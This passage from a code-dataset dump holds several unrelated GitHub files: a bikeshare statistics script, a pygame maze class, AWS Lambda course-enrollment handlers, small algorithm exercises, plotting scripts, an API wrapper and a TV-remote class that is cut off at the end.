user_stats(df, city):\n \"\"\"\n Displays statistics on df users.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n (str) (str) inputed name of the city to analyze\n Returns:\n no return\n \"\"\"\n print (\"\\n|***************************|\")\n print (\"|....Getting Users Stats....|\")\n print (\"|***************************|\\n\")\n start_time = time.time()\n\n # Display counts of user types\n print (\"....User Type Counts....\\n\")\n user_types_counts= df[\"User Type\"].value_counts()\n print (\"There are {} Subscribers\\n\".format(user_types_counts[\"Subscriber\"]))\n print (\"There are {} Customers\\n\".format(user_types_counts[\"Customer\"]))\n \n # excloding washington state from gender and birth year calculations\n if city != \"washington\" :\n # Display counts of gender\n print (\"\\n....User Gender Counts....\\n\")\n user_gender_counts= df[\"Gender\"].value_counts()\n print (\"There are {} Males\\n\".format(user_gender_counts[\"Male\"]))\n print (\"There are {} Females\\n\".format(user_gender_counts[\"Female\"]))\n\n # Display earliest, most recent, and most common year of birth using df.min(), df.max() and df.mode() methods. 
\n print (\"\\n....User Age Stats....\\n\")\n earlist_birth_year= df[\"Birth Year\"].min()\n print(\"Earlist birth year is {}\\n\".format(int(earlist_birth_year)))\n\n most_recent_birth_year= df[\"Birth Year\"].max()\n print(\"Most recent birth year is {}\\n\".format(int(most_recent_birth_year)))\n\n most_common_birth_year= df[\"Birth Year\"].mode()[0]\n print(\"Most common birth year is {}\".format(int(most_common_birth_year)))\n else :\n print (\"\\n|********************************************************************************|\")\n print (\"|Sorry user gender and birth year stats Data does not exist for washington state.|\")\n print (\"|********************************************************************************|\")\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef print_city_title(city):\n \"\"\"\n prints City title in a reqtangle of '#' .\n \n Args:\n (str) (str) inputed name of the city to analyze\n Returns:\n no return\n \"\"\"\n print(\"\\n###################################################\"+\"#\"*(len(city)-2))\n print(\"#/\\/\\/\\/\\/\\ LET US DISCOVER {} STATS :) /\\/\\/\\/\\/\\#\".format(city.upper()))\n print(\"###################################################\"+\"#\"*(len(city)-2)+\"\\n\")\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef print_raw_data(df):\n \"\"\"\n promtes user if he want to prints raw data of the city.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no return\n \"\"\"\n list_of_colums_in_df = df.columns.tolist() # getting a list of columns in df\n list_of_colums_in_df = list_of_colums_in_df[1:len(list_of_colums_in_df)-4] # slicing the column list to view original unmodified raw input file data\n current_row_count = 0 # counter for looping through the df index\n df_rows_limit = len(df.index) # getting number of rows in df \n first_entry= False #flage for loope first time entry\n \n while True:\n if first_entry != False :\n while True :\n try :\n answer = input('\\nWould you like to see more ? Enter [yes] or [any key else to continue].\\n ---> ')\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n else :\n while True :\n try :\n answer = input('\\nWould you like to see some raw data ? 
Enter [yes] or [any key else] to continue.\\n ---> ')\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n if answer.lower() != 'yes':\n print (\"Ok no raw data....\")\n break\n else :\n if first_entry != False :\n print (\"\\nHere are another 5 trips raw data : \\n\")\n else :\n print (\"\\nHere are 5 trips raw data : \\n\")\n first_entry = True\n\n if current_row_count < df_rows_limit-5 :\n print(df[list_of_colums_in_df].loc[current_row_count:current_row_count+5,:].head())\n current_row_count+= 5\n else :\n print(\"\\nNo more raw data to displayed !!\")\n break\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\ndef programe_close() :\n \"\"\"\n promtes user if he want to close programe or continue.\n \n Args: \n no return\n Returns: \n (boolean) True for close peograme or faulse to continue\n \"\"\"\n done = False\n while True :\n try :\n restart = input('\\nWould you like to restart? Enter [yes] to restart or [any key else] to exit.\\n --->')\n if restart.lower() != 'yes':\n print (\"Ok Good bye....\")\n done = True\n break\n except :\n print (\"\\nWow wrong (BAD) input please try again....\\n\")\n continue\n return done \n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n print_city_title(city)\n time_stats(df, month, day)\n station_stats(df)\n trip_duration_stats(df) \n user_stats(df, city)\n print_raw_data(df)\n if programe_close() : break\n \n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"MuhammedAbdelftah/US-bike-share-project","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":18909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39396280661","text":"import pygame\r\nfrom constants import *\r\nimport random\r\n\r\n\r\nclass Level:\r\n \"\"\"class to create a new level\"\"\"\r\n\r\n def __init__(self, file='level_file.txt'):\r\n self.file = file\r\n self.structure = 0\r\n self.three_xy_of_objetcs = []\r\n self.paste_the_3_objects = []\r\n self.mgpaths = []\r\n\r\n def generate(self):\r\n \"\"\"A method to generate the level according level's file.\r\n Create a general list, containing a list for each line\"\"\"\r\n # Open file\r\n with open(self.file, \"r\") as file:\r\n level_structure = []\r\n # for loop for the lines of the file\r\n for line in file:\r\n line_level = []\r\n # For loop for the sprites (letters) in each line\r\n for sprite in line:\r\n # Ignoring the \"\\n\" on the end of the line\r\n if sprite != '\\n':\r\n # Appending the sprite to the list of the lines\r\n line_level.append(sprite)\r\n # Appending the line to the list of the level_structure\r\n level_structure.append(line_level)\r\n # To save this structure\r\n self.structure = level_structure\r\n\r\n # Chosing three random numbers for the x position\r\n r_list = []\r\n while len(r_list) != 3:\r\n for d in range(0, 3):\r\n r = random.randint(0, 102)\r\n if r not in r_list:\r\n r_list.append(r)\r\n\r\n def show(self, 
window):\r\n xy_objetcs = []\r\n \"\"\"Method for displaying the level according to the \r\n\t\tstructure's list from generate()\"\"\"\r\n # Loading images with transparency\r\n wall = pygame.image.load(WALL_IMAGE).convert()\r\n start = pygame.image.load(START_IMAGE).convert()\r\n arrived = pygame.image.load(ARRIVED_IMAGE).convert_alpha()\r\n syringe = [pygame.image.load(PLASTIC_PIPE_IMAGE).convert_alpha(),\r\n pygame.image.load(ETHER_IMAGE).convert_alpha(),\r\n pygame.image.load(NEEDLE_IMAGE).convert_alpha()]\r\n erase_object_image = pygame.image.load(MINI_BACKGROUND_IMAGE).convert()\r\n\r\n # For loop through the list of the leve\r\n num_line = 0\r\n for line in self.structure:\r\n # On parcourt les listes de lignes\r\n num_step = 0\r\n for sprite in line:\r\n # Calculate the x and y position in pixels\r\n x = num_step * SPRITE_SIZE\r\n y = num_line * SPRITE_SIZE\r\n if sprite == 'w': # w = Wall\r\n window.blit(wall, (x, y))\r\n elif sprite == 's': # s = Start\r\n window.blit(start, (x, y))\r\n elif sprite == 'a': # a = Arrived\r\n window.blit(arrived, (x, y))\r\n elif sprite == '0': # 0 = free space\r\n xy_objetcs.append([x, y])\r\n num_step += 1\r\n num_line += 1\r\n three_xy_of_objetcs = [xy_objetcs[self.r_list[n]] for n in range(\r\n 0, 3)] # selection les trois paires x et y au azar\r\n\r\n self.three_xy_of_objetcs = three_xy_of_objetcs\r\n # list to add the three objects randomly\r\n self.paste_the_3_objects.append([window.blit(syringe[i], (\r\n three_xy_of_objetcs[i][0],\r\n three_xy_of_objetcs[i][1])) for i in range(3)])\r\n\r\n for x in self.mgpaths:\r\n\r\n if x in self.three_xy_of_objetcs:\r\n window.blit(erase_object_image, (x[0], x[1]))\r\n","repo_name":"pythondev-pro/my_projects","sub_path":"Openclassrooms Python Developer Projects/p3_MEIO-DIA_Pedro/mg_labyrinth_classes/Level.py","file_name":"Level.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34536125976","text":"inputStr = \"0\t5\t10\t0\t11\t14\t13\t4\t11\t8\t8\t7\t1\t4\t12\t11\"\n\ndef maxIndex(l):\n out = 0\n highest = l[0]\n for i in range(len(l)):\n if l[i] > highest:\n out = i\n highest = l[i]\n return out\n\nbanks = list(map(int, inputStr.split('\\t')))\nvisited = {}\ncurCycle = 0\nwhile tuple(banks) not in visited:\n visited[tuple(banks)] = curCycle\n m = maxIndex(banks)\n blocks = banks[m]\n banks[m] = 0\n for i in range(blocks):\n m = (m + 1) % len(banks)\n banks[m] += 1\n curCycle += 1\nprint(curCycle - visited[tuple(banks)])","repo_name":"kevinmchung/AdventOfCode","sub_path":"2017/Day6/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33993517885","text":"import json\nimport logging\nfrom lib.quizes import set_quiz_status_db, get_quiz_status_db\nfrom lib.classes import get_class_enrollment_db, set_class_enrollment_db, log_class_part_view_db, get_set_class_complete\nfrom lib.certificate import generate_certificate\nfrom lib.emails import email_welcome_messages, email_congrats_messages, email_reminder_messages\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef send_emails(event, context):\n email_welcome_messages()\n email_congrats_messages()\n email_reminder_messages()\n\ndef gen_class_certificate(event, context):\n userId = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n className = 
requestData['className']\n\n quiz_status = get_quiz_status_db(userId, className)\n\n if ( len(quiz_status['passed']) > 0 and len(quiz_status['failed']) == 0 and len(quiz_status['untried']) == 0 ):\n # all quizes passed\n classInfo = get_set_class_complete(userId, className)\n\n cert = generate_certificate(userId, classInfo['display_name'], '%s-%s-%s' % (classInfo['passed_year'], classInfo['passed_month'], classInfo['passed_day']), classInfo['cert_number'], classInfo['cert_hash'], classInfo['course_name'])\n\n body = {\n \"message\": \"certificate generated\",\n \"url\": cert\n }\n \n statusCode = 200\n else:\n statusCode = 404\n body = {\n \"message\": \"certificate not able to be generated\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\n\ndef get_class_enrollment(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n className = event['queryStringParameters']['className']\n\n enrollment = get_class_enrollment_db(user, className)\n\n logger.info(\"enrollment retrieved for user %s in class %s: %s\" % (user, className, enrollment))\n\n body = {\n \"message\": \"enrollment retrieved\",\n \"enrolled\": enrollment\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\ndef set_class_enrollment(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n className = requestData['className']\n firstName = requestData['firstName']\n lastName = requestData['lastName']\n\n enrollment = set_class_enrollment_db(user, className, firstName, lastName)\n\n logger.info(\"enrollment indicated for user %s in class %s\" % (user, className))\n\n body = {\n \"message\": \"enrollment indicated\",\n \"enrolled\": True\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n # Add marketo call to note enrollment of user in a course\n\n return response\n\ndef log_training_view(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n requestData = json.loads(event[\"body\"])\n\n className = requestData['className']\n partName = requestData['partName']\n\n log_class_part_view_db(user, className, partName)\n\n body = {\n \"message\": \"view indicated\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\n\n\ndef get_quiz_status(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n className = event['queryStringParameters']['className']\n\n quizStatus = get_quiz_status_db(user, className)\n\n body = {\n \"message\": \"Quiz status retrieved\",\n \"quizStatus\": quizStatus\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n\ndef set_quiz_status(event, context):\n user = event['requestContext']['authorizer']['jwt']['claims']['sub'] \n 
requestData = json.loads(event[\"body\"])\n\n set_quiz_status_db(user, requestData[\"className\"], {\"passed\": requestData[\"passed\"], \"failed\": requestData[\"failed\"]})\n\n logger.info(\"quiz status indicated for user %s in class %s with passed %s and failed %s\" % (user, requestData[\"className\"], json.dumps(requestData[\"passed\"]), json.dumps(requestData[\"failed\"])))\n\n body = {\n \"message\": \"Updated quiz status\"\n }\n\n headers = { \"Content-type\": \"application/json\", \"Access-Control-Allow-Origin\": \"*\" }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n\n return response\n","repo_name":"neo-technology/neo4j-graphacademy-api","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24481696708","text":"def binarySearch(input, searchInput):\n input.sort()\n first = 0\n last = len(input)-1\n print(input)\n while first <=last:\n mid = (first+last)//2\n #print(mid)\n if input[mid]==searchInput:\n return mid,searchInput\n elif searchInput > input[mid]:\n first = mid+1\n else:\n last =mid-1\n if first>last:\n return None\n\n\n####Driver Code######\ninput = [12,4,23,1,98,11,21]\nprint(binarySearch(input,1))\n\n\n#Time Complexity = O(log n)\n#Space Complexity = O(1)","repo_name":"DeepaliTandale/DS_Algorithms","sub_path":"DS_Searching/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9519510582","text":"import matplotlib.pyplot as plt\n\ndef coordinate():\n print(\"Enter an x value:\")\n # read in the user's response and store it in a variable named x.\n x = int(input())\n print(\"Enter an y value:\")\n # read in the user's response and store it in a variable named y.\n y = int(input())\n\n # return a tuple containing x and y.\n return (x,y)\n\ndef path():\n print(\"Retrieving path...\")\n \n #creates empty list for x_values and y_values\n x_values = []\n y_values = []\n \n #loop that iterates 4 times\n for count in range(4):\n \n #Calls the first function and stores the result in a variable named data.\n data = coordinate()\n \n #Adds the first item of data (the x value) to x_values.\n x_values.append(data[0])\n #Adds the second item of data (the y value) to y_values.\n y_values.append(data[1])\n \n #return a list containing x_values and y_values. 
\n return [x_values,y_values]\n\ndef run():\n \n #calls the second function and store the result in variable named value\n values = path()\n \n #display a line plot using values[0] for the x values and values[1] for the y values.\n #The line plot should draw a red dashed line with circle markers\n plt.plot(values[0],values[1], 'r--o')\n \n # contain suitable labels for the axes.\n plt.xlabel(\"x values\")\n plt.ylabel(\"y values\")\n \n #shows the graph\n plt.show()\n \n \nrun()\n \n \n","repo_name":"xspize/com411","sub_path":"visual/plots/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3808785908","text":"from djitellopy import Tello\nimport time\nimport cv2\n\n\n\n\ntello = Tello()\ntello.connect()\n\ntello.query_battery()\n\n\n# tello.streamoff()\n\ntello.streamon()\nframe_read = tello.get_frame_read()\n\nprint(\"\\n=================================\\n\")\nprint(type(frame_read))\n\nprint(\"\\n=================================\\n\")\nprint(frame_read)\n\ntello.streamoff()\n# tello.takeoff()\n# cv2.imwrite(\"picture.png\", frame_read.frame)\n\n# tello.land()","repo_name":"jarvisN/non2023","sub_path":"python/10_NonDrone/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3708155632","text":"import time as t\nfrom math import sqrt\nfrom colorama import Fore, Back, Style\n\nx=int(input('Square roots for how many numbers?: ')) \n\nm=t.gmtime() #Returns current time and date\nn=':'.join(str(i) for i in m[3:6]) #Acess only date, creating a string with info\nprint('Current time '+Fore.GREEN+n+Style.RESET_ALL+'(h:m:s)') #Prints current time in green\n\n\nz=t.time() #start time\nfor i in range(1,x+1): #calculates the square roots for x amount of numbers\n sqrt(i) #no variable defined, since the interest is in the cicle time\n if i==x:\n y=t.time() #endtime\n print(\"Elapsed time:{} {:.2E} {}(units of time)\".format(Fore.RED,(y-z),Style.RESET_ALL))","repo_name":"Diogo-Mateiro/PSR_23-24","sub_path":"Python/Parte3/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1081483612","text":"from __future__ import annotations\n\nimport json\nimport re\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom enum import Enum\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\n\nELEMENT_COUNT_REGEX = re.compile(r\"(?<=/)[0-9]+\")\nRESULTS_FILE = (\n Path(os.path.dirname(os.path.realpath(__file__))) / \"results/benchmark_results.json\"\n)\n\n\nclass ElementType(Enum):\n Float = 0\n Double = 1\n Int = 2\n\n @staticmethod\n def from_str(type: str) -> ElementType:\n return ElementType[type.capitalize()]\n\n @staticmethod\n def from_benchmark_name(name: str) -> ElementType:\n if \"float\" in name:\n return ElementType.Float\n elif \"double\" in name:\n return ElementType.Double\n elif \"int\" in name:\n return ElementType.Int\n else:\n raise Exception(\"Unknown element type.\")\n\n\n@dataclass\nclass Benchmark:\n cpu_time_s: float\n real_time_s: float\n iterations: int\n element_count: int\n element_type: ElementType\n label: str\n\n def __post_init__(self):\n self.cpu_time_per_iteration_s = self.cpu_time_s / self.iterations\n\n\nBenchmarkClassification = dict[ElementType, dict[str, 
list[Benchmark]]]\n\n\ndef parse_benchmarks(\n json_dict: dict,\n) -> tuple[BenchmarkClassification, list[Benchmark]]:\n benchmarks: list[Benchmark] = []\n classification: BenchmarkClassification = {}\n for bench in json_dict:\n\n if bench[\"run_type\"] != \"iteration\":\n continue\n\n element_count_match = ELEMENT_COUNT_REGEX.search(bench[\"name\"])\n\n if element_count_match == None:\n raise Exception(\n f\"Failed to parse element count number from {bench['name']}\"\n )\n else:\n assert element_count_match is not None\n element_count: int = eval(element_count_match.group(0))\n\n element_type = ElementType.from_benchmark_name(bench[\"name\"])\n label = bench[\"name\"].split()[0]\n benchmark = Benchmark(\n bench[\"cpu_time\"],\n bench[\"real_time\"],\n bench[\"iterations\"],\n element_count,\n element_type,\n label,\n )\n benchmarks.append(benchmark)\n if element_type not in classification:\n classification[element_type] = {label: [benchmark]}\n continue\n if label not in classification[element_type]:\n classification[element_type][label] = [benchmark]\n continue\n\n classification[element_type][label].append(benchmark)\n\n return classification, benchmarks\n\n\ndef load_benchmark_results():\n with RESULTS_FILE.open() as results_file:\n results_json = json.load(results_file)\n return results_json\n\n\ndef plot_benchmarks(classification: BenchmarkClassification):\n\n fig, axs = plt.subplots(1, len(classification))\n\n for i, element_type in enumerate(classification):\n\n std_benchmark_list = classification[element_type][\"std\"]\n std_cpu_time = np.array(\n [std_benchmark.cpu_time_s for std_benchmark in std_benchmark_list]\n )\n\n for label in classification[element_type]:\n benchmark_list = classification[element_type][label]\n ax = axs[i]\n\n element_count = np.array(\n [benchmark.element_count for benchmark in benchmark_list]\n )\n cpu_time = np.array([benchmark.cpu_time_s for benchmark in benchmark_list])\n\n ax.plot(element_count, cpu_time, label=benchmark_list[0].label)\n ax.set_title(f\"{element_type.name} sort timing\")\n ax.set_xlabel(\"element count\")\n ax.set_ylabel(\"cpu time [s]\")\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n ax.legend()\n fig.set_tight_layout(True)\n plt.show()\n fig.savefig(f\"./results/timing_vs_element_count.jpg\")\n\n\ndef plot_speedup(classification: BenchmarkClassification):\n\n fig, axs = plt.subplots(1, len(classification))\n\n for i, element_type in enumerate(classification):\n\n std_benchmark_list = classification[element_type][\"std\"]\n std_cpu_time = np.array(\n [std_benchmark.cpu_time_s for std_benchmark in std_benchmark_list]\n )\n std_element_count = np.array(\n [benchmark.element_count for benchmark in std_benchmark_list]\n )\n\n general_benchmark_list = classification[element_type][\"general\"]\n general_cpu_time = np.array(\n [benchmark.cpu_time_s for benchmark in general_benchmark_list]\n )\n general_element_count = np.array(\n [benchmark.element_count for benchmark in general_benchmark_list]\n )\n\n ax = axs[i]\n\n assert (general_element_count == std_element_count).all()\n ax.plot(\n general_element_count,\n std_cpu_time / general_cpu_time,\n )\n ax.set_title(f\"{element_type.name} speed-up vs std\")\n ax.set_xlabel(\"element count\")\n ax.set_ylabel(\"speed-up\")\n ax.legend()\n\n fig.set_tight_layout(True)\n plt.show()\n fig.savefig(f\"./results/speedup.jpg\")\n\n\nif __name__ == \"__main__\":\n result_dct = load_benchmark_results()\n benchmarks_dct = result_dct[\"benchmarks\"]\n classification, benchmarks = 
parse_benchmarks(benchmarks_dct)\n\n plot_benchmarks(classification)\n plot_speedup(classification)\n","repo_name":"jlapajne/AVX-bitonic-sort","sub_path":"benchmarks/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36964571897","text":"import matplotlib.pyplot as plt\n\n# Corrected data with proper execution times\ndata = {}\ndata[\"floyd-warshal\"] = [0.00, 0.14, 1.12, 3.72, 8.76] # Times in seconds\n\n# Fox execution times in seconds. The failed test for input size 6 is not included.\ndata[\"fox-16\"] = [None, 1.97, 2.92, 5.46, 10.86]\ndata[\"fox-9\"] = [1.82, 2.05, 3.60, 7.81, 17.34]\ndata[\"fox-4\"] = [1.73, 2.15, 5.25, 14.56, 34.39]\ndata[\"fox-1\"] = [1.70, 3.25, 15.59, 49.63, 125.14]\n\ninput_sizes = [6, 300, 600, 900, 1200]\n\n# Plotting the graph with a logarithmic scale and specified colors\nplt.figure(figsize=(14, 8))\n\n# Floyd-Warshal plot with red color\nplt.plot(input_sizes, data[\"floyd-warshal\"], marker='o', color='red', label='Floyd-Warshal')\n\n# Fox plots with specified colors\n# We will use a lambda function to filter out 'None' values for plotting\nplt.plot([size for size, time in zip(input_sizes, data[\"fox-16\"]) if time is not None], \n [time for time in data[\"fox-16\"] if time is not None], \n marker='s', color='blue', label='Fox 16 procs')\n\nplt.plot(input_sizes, data[\"fox-9\"], marker='^', color='yellow', label='Fox 9 procs')\nplt.plot(input_sizes, data[\"fox-4\"], marker='x', color='orange', label='Fox 4 procs')\nplt.plot(input_sizes, data[\"fox-1\"], marker='d', color='green', label='Fox 1 proc') # Added green for contrast\n\n# Setting logarithmic scale for the y-axis\nplt.yscale('log')\n\n# Titles and labels\nplt.title('Execution Time Comparison on a Logarithmic Scale')\nplt.xlabel('Input Size')\nplt.ylabel('Execution Time (seconds, log scale)')\nplt.legend()\nplt.grid(True, which=\"both\", ls=\"--\")\n\n# Show plot\n# plt.savefig('performance-table-pic.png')\nplt.show()\n\n","repo_name":"marosstudenic/parralel-computing-fox-algorithm-min-path-problem","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10533624444","text":"from typing import Optional\n\nfrom mi.framework.http import HTTPSession\nfrom mi.framework.router import Route\n\n\nclass AdminModeratorManager:\n def __init__(self, user_id: Optional[str] = None):\n self.__user_id: Optional[str] = user_id\n\n async def add(self, user_id: Optional[str] = None) -> bool:\n \"\"\"\n Add a user as a moderator\n\n Parameters\n ----------\n user_id : Optional[str], default=None\n ユーザーのID\n\n Returns\n -------\n bool\n 成功したか否か\n \"\"\"\n\n user_id = user_id or self.__user_id\n data = {'userId': user_id}\n res = await HTTPSession.request(Route('POST', '/api/moderators/add'), json=data, auth=True, lower=True)\n return bool(res)\n\n async def remove(self, user_id: Optional[str] = None) -> bool:\n \"\"\"\n Unmoderate a user\n\n Parameters\n ----------\n user_id : Optional[str], default=None\n ユーザーのID\n\n Returns\n -------\n bool\n 成功したか否か\n \"\"\"\n user_id = user_id or self.__user_id\n data = {'userId': user_id}\n res = await HTTPSession.request(Route('POST', '/api/moderators/remove'), json=data, auth=True, lower=True)\n return 
bool(res)\n","repo_name":"yupix/Mi.py","sub_path":"mi/wrapper/moderator.py","file_name":"moderator.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"32516116211","text":"import sys\nimport collections\n\nclass ExeptionNb(Exception): pass\n\ndef chek_base(baseSrc):\n\ti = 0\n\ttmp = baseSrc\n\tfor x in baseSrc:\n\t\tfor y in tmp:\n\t\t\tif x == y:\n\t\t\t\ti += 1\n\t\t\tif i > 1:\n\t\t\t\tprint(\"Некорректная система счисления (повторяющиеся символы)\")\n\t\t\t\tsys.exit()\n\t\ti = 0\n\n\ndef itoBase(nb, baseSrc = None, baseDst = None):\n\tchek_base(baseSrc)\n\tif baseDst == None:\n\t\tbaseS = len(baseSrc)\n\t\tnb = int(nb)\n\t\td = {}\n\t\tres = list()\n\t\tfor k in range(baseS):\n\t\t\td[k] = baseSrc[k]\n\t\twhile nb >= baseS:\n\t\t\tres.append(d[nb % baseS])\n\t\t\tnb = nb // baseS\n\t\telse:\n\t\t\tres.append(d[nb % baseS])\n\t\t\tres.reverse()\n\t\treturn ''.join(res)\n\telse:\n\t\tbs = len(baseSrc)\n\t\tl = len(nb) - 1\n\t\tlnb = l\n\t\tdd = {}\n\t\tnum = list()\n\t\ti = 0\n\t\tfor k in baseSrc:\n\t\t\tdd[k] = i\n\t\t\ti += 1\n\t\tz = 0\n\t\twhile l >= 0:\n\t\t\ttry:\n\t\t\t\tnum.append(dd[nb[z]] * ((i)**l))\n\t\t\texcept KeyError:\n\t\t\t\tprint(\"не соответствие числа и системы счисления\")\n\t\t\t\tsys.exit()\n\t\t\tl -= 1\n\t\t\tz += 1\n\t\tnum = sum(num)\n\t\tres = itoBase(num, baseDst, None)\n\t\tif type(res) == str:\n\t\t\treturn res\n\ndef main():\n\tav = sys.argv\n\tres = None\n\tif len(av) == 3:\n\t\ttry:\n\t\t\tnb = int(av[1])\n\t\t\tif nb < 0:\n\t\t\t\traise ExeptionNb()\n\t\t\tres = itoBase(nb, av[2])\n\t\t\tprint(res)\n\t\texcept ExeptionNb:\n\t\t\tprint(\"Введено число со знаком, НЕ ВЕРНО\")\n\t\texcept ValueError as err:\n\t\t\tprint(err + \" Введено не число, НЕ ВЕРНО\")\n\telif len(av) == 4:\n\t\tres = itoBase.itoBase(av[1], av[2], av[3])\n\t\tprint(\"Число сконвектировано: \", res)\n\telse:\n\t\tprint(\"некоректное число аргументов\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"nfrolov1992/Python","sub_path":"task1/SRC/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41280800508","text":"import random\nimport time\n\nclass Kumanda():\n\n def __init__(self,tv_durum = \"Kapalı\", tv_sees = 0, kanal_listei = [\"Trt\"], kanal = \"Trt\"):\n self.tv_durum = tv_durum\n self.tv_ses = tv_sees\n self.kanal_listesi = kanal_listei\n self.kanal = kanal\n\n def tv_ac(self):\n if(self.tv_durum == \"Açık\"):\n print(\"Televizyon zaten açık..\")\n else:\n print(\"Televizyon Açılıyor..\")\n self.tv_durum = \"Açık\"\n\n def tv_kapat(self):\n if(self.tv_durum == \"Kapalı\"):\n print(\"Televizyon zaten kapalı..\")\n else:\n print(\"Televizyon Kapanıyor..\")\n self.tv_durum = \"Kapalı\"\n\n def ses_ayarları(self):\n while True:\n cevap = input(\"Sesi azalt: '<'\\nSesi Artır: '>'\\nÇıkış: çıkış\")\n\n if(cevap == \"<\"):\n if(self.tv_ses != 0):\n self.tv_ses -= 1\n print(\"Ses:\", self.tv_ses)\n elif(cevap == '>'):\n if(self.tv_ses != 31):\n self.tv_ses += 1\n print(\"Ses:\", self.tv_ses)\n else:\n print(\"Ses güncellendi:\", self.tv_ses)\n break\n\n def kanal_ekle(self,kanal_ismi):\n print(\"Kanal ekleniyor.\")\n time.sleep(1)\n self.kanal_listesi.append(kanal_ismi)\n print(\"Kanal eklendi.\")\n\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi)-1)\n self.kanal = self.kanal_listesi[rastgele]\n 
